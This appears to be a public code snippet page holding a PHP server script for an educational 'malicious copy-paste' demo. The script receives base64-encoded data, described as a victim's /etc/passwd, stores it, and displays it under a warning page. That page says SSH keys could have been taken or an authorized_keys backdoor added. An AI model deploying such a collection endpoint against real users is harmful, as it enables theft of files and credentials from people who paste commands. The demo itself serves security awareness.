Malicious Shell Copy Paste Demo
The snippet can be accessed without any authentication.
Authored by
Anton Sarukhanov
Edited
<?php
$pwnpath = '/home/anton/paste/pwns/';
$lecture = <<<EOF
<!doctype html>
<html>
<head>
<title>pwnt</title>
</head>
<body>
<h2>youve been pwnt</h2>
<hr>
<p>
I just stole your /etc/passwd. That isn't too bad, its just a list of users on your machine.. But I could just as easily have taken your <strong>SSH private key</strong>, <strong>SSL keys/certs</strong>, and <strong>any other data your account can read</strong>.
</p>
<p>
<strong>Or...</strong> I could have <em>written</em> data instead. Such as adding a new private key to your ~/.ssh/authorized_keys file, so that I could <strong>sneak in later and wreak havoc</strong>. In fact, are you sure I didn't? ;)
</p>
<p>
To see how that exploit was pulled off, read the source of <a href="http://antsar.rutgers.edu/paste">antsar.rutgers.edu/paste</a>
<hr>
<p>
Here's your /etc/passwd file, for proof:
</p>
<pre>
EOF;
$htmlfoot = <<<EOF
</pre>
</body>
</html>
EOF;
if (isset($_GET['d'])) {
$id = uniqid();
if ($dec = base64_decode($_GET['d'])) {
file_put_contents($pwnpath.$id, $dec);
echo "http://antsar.rutgers.edu/paste/p.php?id={$id}";
} else {
echo "oops, nevermind";
}
} elseif (isset($_GET['id'])) {
if (preg_match('/[^a-z_\-0-9]/i', $_GET['id'])) {
die('invalid id');
} else {
$id = $_GET['id'];
if (file_exists($pwnpath.$id)) {
echo $lecture;
echo file_get_contents($pwnpath.$id);
echo $htmlfoot;
} else {
die('invalid id');
}
}
}
?>
Please register or sign in to comment